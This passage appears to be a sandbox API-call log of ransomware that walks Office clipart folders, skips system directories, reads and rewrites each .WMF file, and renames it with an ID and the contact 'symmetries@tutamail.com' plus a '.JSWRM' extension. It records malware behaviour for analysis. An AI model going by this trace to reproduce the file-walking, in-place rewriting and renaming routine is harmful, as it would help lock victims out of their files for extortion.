lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0082.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0082.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107450.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107450.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107450.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0082.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0082.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0082.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0082.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.266] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4920) returned 1 [0082.266] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1330) returned 0x205850 [0082.267] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1330, lpOverlapped=0x0) returned 1 [0082.268] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.268] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1330, lpOverlapped=0x0) returned 1 [0082.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.269] CloseHandle (hObject=0x314) returned 1 [0082.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0082.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0082.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0082.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0082.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0082.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0082.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.269] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107450.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107450.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0082.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0082.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0082.270] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x52e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107452.WMF", cAlternateFileName="")) returned 1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2=".") returned 1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2="..") returned 1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2="...") returned 1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2="windows") returned -1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2="recovery") returned -1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2="perflogs") returned -1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2="documents and settings") returned 1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2="system volume information") returned -1 [0082.270] lstrcmpiW (lpString1="J0107452.WMF", lpString2="msocache") returned -1 [0082.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107452.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107452.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107452.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0082.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107452.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107452.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107452.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0082.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0082.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0082.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0082.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.299] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21216) returned 1 [0082.299] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x52e0) returned 0x24d210 [0082.300] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x52e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x52e0, lpOverlapped=0x0) returned 1 [0082.380] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.380] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x52e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x52e0, lpOverlapped=0x0) returned 1 [0082.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.381] CloseHandle (hObject=0x314) returned 1 [0082.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0082.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0082.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0082.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0082.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0082.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0082.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.381] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107452.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107452.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0082.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0082.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0082.382] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e9e74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6e9e74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe8c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107456.WMF", cAlternateFileName="")) returned 1 [0082.382] lstrcmpiW (lpString1="J0107456.WMF", lpString2=".") returned 1 [0082.382] lstrcmpiW (lpString1="J0107456.WMF", lpString2="..") returned 1 [0082.382] lstrcmpiW (lpString1="J0107456.WMF", lpString2="...") returned 1 [0082.382] lstrcmpiW (lpString1="J0107456.WMF", lpString2="windows") returned -1 [0082.382] lstrcmpiW (lpString1="J0107456.WMF", lpString2="recovery") returned -1 [0082.382] lstrcmpiW (lpString1="J0107456.WMF", lpString2="perflogs") returned -1 [0082.382] lstrcmpiW (lpString1="J0107456.WMF", lpString2="documents and settings") returned 1 [0082.383] lstrcmpiW (lpString1="J0107456.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.383] lstrcmpiW (lpString1="J0107456.WMF", lpString2="system volume information") returned -1 [0082.383] lstrcmpiW (lpString1="J0107456.WMF", lpString2="msocache") returned -1 [0082.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107456.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107456.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107456.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0082.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107456.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107456.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107456.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0082.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0082.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0082.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0082.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.383] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3724) returned 1 [0082.383] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe80) returned 0x23fc98 [0082.384] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xe80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xe80, lpOverlapped=0x0) returned 1 [0082.385] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.385] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xe80, lpOverlapped=0x0) returned 1 [0082.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0082.386] CloseHandle (hObject=0x314) returned 1 [0082.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0082.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0082.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0082.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0082.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0082.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.386] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107456.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107456.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0082.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0082.387] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6e9e74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6e9e74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6e9e74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdf0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107458.WMF", cAlternateFileName="")) returned 1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2=".") returned 1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2="..") returned 1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2="...") returned 1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2="windows") returned -1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2="recovery") returned -1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2="perflogs") returned -1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2="documents and settings") returned 1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2="system volume information") returned -1 [0082.387] lstrcmpiW (lpString1="J0107458.WMF", lpString2="msocache") returned -1 [0082.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107458.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107458.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107458.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0082.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107458.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107458.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107458.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0082.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0082.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0082.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.387] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0082.387] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107458.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107458.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.388] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3568) returned 1 [0082.388] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, 